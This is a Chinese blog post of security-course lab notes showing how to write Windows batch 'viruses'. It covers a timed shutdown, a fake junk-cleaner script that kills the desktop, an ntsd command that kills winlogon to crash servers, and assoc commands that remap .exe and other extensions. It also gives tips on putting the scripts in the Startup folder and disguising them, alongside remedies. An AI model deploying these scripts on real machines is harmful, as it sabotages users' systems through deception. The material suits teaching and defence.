病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒
病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒
- 一、前言
- 二、时间过程详细小记
- 1、关机bat脚本
- 实践步骤记录:
- 2、最简单的蓝屏炸弹文件
- 3、进程关闭病毒
- 关于ntsd
- 方法一:利用进程的PID结束进程
- 方法二:利用进程名结束进程
- 4、扩展名病毒
- 解决方法:
- 拓展思考
- 三、小啊呜有话说
叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
一、前言
信息安全技术实践课之计算机病毒与黑客实验中相关实践小记。
建议所有相关操作都在虚拟机中完成。希望这篇基础文章对大家有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
二、时间过程详细小记
1、关机bat脚本
关机bat脚本主要是调用“shutdown”实现关机。
其基本步骤如下:
新建文本文档
输入 shutdown -s -t 600
把txt改成bat
如下图所示,运行CMD可以查看shutdown命令的基本用法。
基本命令为:
shutdown -s -t 600
//现在让系统600秒之后关机shutdown -a
//终止关闭计算机
实践步骤记录:
1、新建“test.bat”并填写“ shutdown -s -t 600”,某些系统需要在“文件夹选项”中,显示“隐藏已知文件类型的扩展名”。
把txt改成bat
2、双击BAT文件即运行关机。
运行结果如下图所示:
3、如果需要取消,还是在CMD黑框中输入“shutdown -a”命令。
2、最简单的蓝屏炸弹文件
这是一个伪装垃圾清理的批处理代码。
该命令是杀死进程:
“/im explorer.exe”表示要杀死的进程名称,关闭桌面;
“/f”表示强制杀死;“>nul”表示在屏幕上不要输出任何信息。
taskkill /im explorer.exe /f >nul 2>nul
完整代码如下所示,其中“Start c:\windows\expolrer.exe”表示继续开启桌面,“ping -n 5 127.0.0.1>nul”用于消耗时间。
TEST.bat
@echo off
title 系统垃圾清理
color 1f
echo =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】====
echo.
echo.
echo.
echo =====垃圾清理中,请不要关闭窗口=========
echo.
ping -n 5 127.0.0.1>nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo =====拐了,你的系统已经废了=======
echo.
ping -n 5 127.0.0.1>nul
echo.
Start c:\windows\explorer.exe
echo.
echo =====已经修复好!是不是吓坏了!!O(∩_∩)O==========
pause
运行该批处理程序,桌面会消失,如下图所示。
过一会桌面又会恢复。
这里由于桌面设置了壁纸自动切换,所以不用在意壁纸的不同。
3、进程关闭病毒
相关步骤如下:
1、新建文本文档
2、输入:ntsd -c q -pn winlogon.exe,表示强制杀死进程
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动,打开game.bat文件
黑客很少攻击个人,一般攻击服务器,该命令对2003的服务器特别有杀伤力
双击之后,服务器直接蓝屏显示并重启。
关于ntsd
ntsd从Windows 2000开始就是系统自带的进程调试工具,在system32目录下。ntsd的功能非常的强大,用法也比较复杂,但如果只用来结束一些进程,那就比较简单了。
在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。lsass.exe也不要杀掉,它是负责本地账户安全的。被调试器附着的进程会随调试器一起退出,所以可以用来在命令行下终止进程。
打开cmd 后输入以下命令就可以结束进程:
方法一:利用进程的PID结束进程
命令格式:ntsd -c q -p pid命令范例:ntsd -c q -p 1332 (结束explorer.exe进程)
范例详解:explorer.exe的pid为1332,但是如何获取进程的pid呢?
在CMD下输入TASKLIST就可以获取当前任务管理器所有进程的PID。
或者打开任务管理器,在菜单栏,选择“查看”->“选择列”,在打开的选择项窗口中将“PID(进程标识符)”项选择钩上,这样任务管理器的进程中就会多出PID一项了。PID的分配并不固定,是在进程启动是由系统随机分配的,所以进程每次启动的进程一般都不会一样。
方法二:利用进程名结束进程
命令格式:ntsd -c q -pn xxxx.exe (xxxx.exe 为进程名,exe不能省)命令范例:ntsd -c q -pn explorer.exe
另外的能结束进程的DOS命令还有taskkill和tskill命令。
4、扩展名病毒
将文件格式修改或文档加密都是常见的病毒,比如永恒之蓝、勒索病毒等,它们就是将电脑内的所有资料、文档加密,当你要打开文件时,需要密码,此时通过比特币付费进行勒索。
扩展名病毒是将exe文件修改为txt文档。当遇到可执行的exe文件,会认为它是一个txt文档,用记事本打开,导致可执行程序运行不起来,这是就是这个病毒的原理。
相关步骤如下:
1、新建文本文档
2、增加代码:assoc.exe=txtfile
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动,打开bat文件
6、双击运行bat文件之后,我们的可执行文件就变成了txt文件。此时系统认为exe就是txt程序,把系统的关联搞混乱了,它恢复起来很麻烦。
记得把文件放到启动菜单哦!
EXE程序打开如下图所示。
需要执行下面的命令还原exe文件。
assoc.exe=exefile
解决方法:
如果您不幸中了该病毒,怎么解决呢?如下图所示,还原所有正确关联即可。
assoc.txt=txtfile
效果如下图所示。
可怜的壁纸还是要重新设置啦!拓展思考
其他所有文件格式都转换为txt文件,如下所示。此时,如果隐藏文件扩展名,甚至可以修改图标伪装成目标应用,当用户点击时会执行这些破坏;但由于不知道目标是否有隐藏文件扩展名,还是不建议这种“笨”方法。
assoc .htm=txtfile
assoc .dat=txtfile
assoc .com=txtfile
assoc .rar=txtfile
assoc .gho=txtfile
assoc .mvb=txtfile
...
三、小啊呜有话说
今天收获良多呀!
Ending!
更多课程知识学习记录随后再来吧!
就酱,嘎啦!
注:
1、人生在勤,不索何获。
2、病毒详解及批处理病毒制作详细文章参见:
https://blog.csdn.net/csdnnews/article/details/104322825
病毒制作实践小记:运行关机、蓝屏炸弹、进程关闭、拓展名病毒相关推荐
- 病毒详解及批处理病毒制作:自启动、修改密码、定时关机、蓝屏、进程关闭...
[编者按]病毒这个不速之客让人谈之色变,它像一个藏在斗篷侠下的黑衣人,被"光顾"的人就会倒霉.本文为作者的网络安全自学教程系列文章之一,将讲解简单的病毒原理知识,并通过批处理代码制 ...
- [网络安全自学篇] 四十五.病毒详解及批处理病毒原理分析(自启动、修改密码、定时关机、蓝屏、进程关闭)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了Windows远程桌面服务漏洞(CVE-2019-0708),并详细讲 ...
- 计算机关机时出现蓝屏,关机蓝屏,教您电脑关机蓝屏怎么解决
电脑谁的会用,但是电脑出问题了可不是谁都会修哦,其中电脑关机后蓝屏我相信绝大多数人都尝试过了吧,很多人面对这种情况都表示无奈吧,毕竟不是每一个人都是修电脑的专家啊,下面,小编给大家带来了电脑关机蓝屏的 ...
- 计算机误删用户且电脑关机了,我的电脑在我把C盘好像是ldquo;用户rdquo;里某的文件删掉后关机蓝屏,现在求救高人:_已解决 - 阿里巴巴生意经...
我的电脑在我把C盘好像是"用户"里某的文件删掉后关机蓝屏,现在求救高人: 1,开始菜单快捷方式消失,2,关机时候出现蓝屏,主要代码stop 0X00000018 (0X000000 ...
- win7电脑关机出现蓝屏怎么办?解决win7电脑关机蓝屏的方法
解决win7电脑关机蓝屏的方法 右键"计算机"→"属性"→"高级系统设置";(详见下图) 出现以下界面,点击最下方一个"设置&qu ...
- 电脑关机蓝屏,然后自动重启的问题解决。
[size=large]问题描述:[/size] 昨天下午开始关机然后蓝屏再自动重启... 最开始我也以为是硬件或者系统的问题,最后才知不是的,因为之前没有这种情况... [size=large]错误 ...
- Thinkpad T430 关机蓝屏后重启--问题分析及解决(转载)
THINKPAD T430等WIN7系统关机蓝屏.重启 近日,我刚购得的小黑T430偶尔出现关机时有windows警告音,然后蓝屏重启后,windows弹出windows已从异常关机中恢复对话框,其中 ...
- 服务器系统蓝屏进不去怎么办,蓝屏无法进入任何模式怎么办_网站服务器运行维护,蓝屏...
如何在mac上配置apache和php_网站服务器运行维护 在mac上配置apache和php的方法是:1.查看系统预装的apache和php版本:2.修改apache配置文件:3.生成php配置文件 ...
- STOP 0X00000018关机蓝屏重启问题
几天前闲的无聊就研究了一下优盘加密.但突然关机的出现了蓝屏!!!代码如下 STOP 0X00000018(0X00000000,0X9A5EC280,0X00000002,0XFFFFFFFF) 问题 ...
- WIN TO GO (WTG):windows装入U盘 WTG安装+拔出U盘强制关机蓝屏处理(win10)
下载企业版镜像 LSTC LTSB-https://hellowindows.cn/ magnet:?xt=urn:btih:366ADAA52FB3639B17D73718DD5F9E3EE9477 ...
最新文章
- 面试前临时抱佛脚——常见的Shell脚本面试题
- java并发编程基础系列(五): 创建线程的四种方式
- Android学习笔记-----一个很好用的搜索网站,你懂的
- Android网络框架OK3,Android网络框架---OkHttp3
- 新东方:俞敏洪个人博客文章不代表公司观点 半年报即将发布
- 第8章 集成Log4J日志
- RN上使用react-native-video视频播放器插件
- 2022-2028年全球与中国硬盘驱动器存储模块行业深度分析
- 苹果计算机远程控制软件,向日葵远程控制软件iPhone手机远程控制电脑
- 计算机中8位二进制机器数,一个字节由8位二进制数组成,其最大容纳的十进制整数为()...
- 家用计算机初步,职称计算机Internet基础知识:配置家庭局域网
- 最新Java后端面经合集 | 阿里腾讯百度字节
- UE学习笔记:源码安装UE
- 关于球型Shader的写法
- 批处理命令一日一教学
- 高速充电手机电池问世 充满电只需10秒
- 用C语言实现杨辉三角
- 第二章 正则表达式 2021-09-07
- oracle日记账导出,OracleEBSR12GL日记账业务操作01:日记账批录入
- Spring源码解析之 Bean与BeanDefinition详解